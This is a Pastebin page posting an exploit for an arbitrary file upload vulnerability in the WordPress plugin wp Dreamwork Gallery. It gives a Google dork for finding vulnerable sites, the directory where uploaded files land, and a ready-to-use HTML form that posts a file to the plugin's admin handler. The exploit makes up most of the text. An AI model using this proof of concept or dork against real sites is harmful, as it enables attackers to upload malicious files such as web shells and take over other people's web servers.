Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
- \ \ / /| | '__| | | / __|\ /| | | |_ /
- \ V / | | | | |_| \__ \/ \| |_| |/ /
- \_/ |_|_| \__,_|___/_/\_\____//___|
- -->
- #########################################################
- # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery
- # Contact: FB: Abdou MjCodez Tw: VirusXDz
- # Category: webapps
- # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
- ########################################################
- # Proof of Concept
- the uploaded file will be located in the directory
- Example : [(7)_uploadfolder]
- /wp-content/uploads/dreamwork/7_uploadfolder/big/
- <html>
- <body>
- <form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="drm_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- Video :
- https://youtu.be/_7uAkAzlFrY
- Bye
Add Comment
Please, Sign In to add comment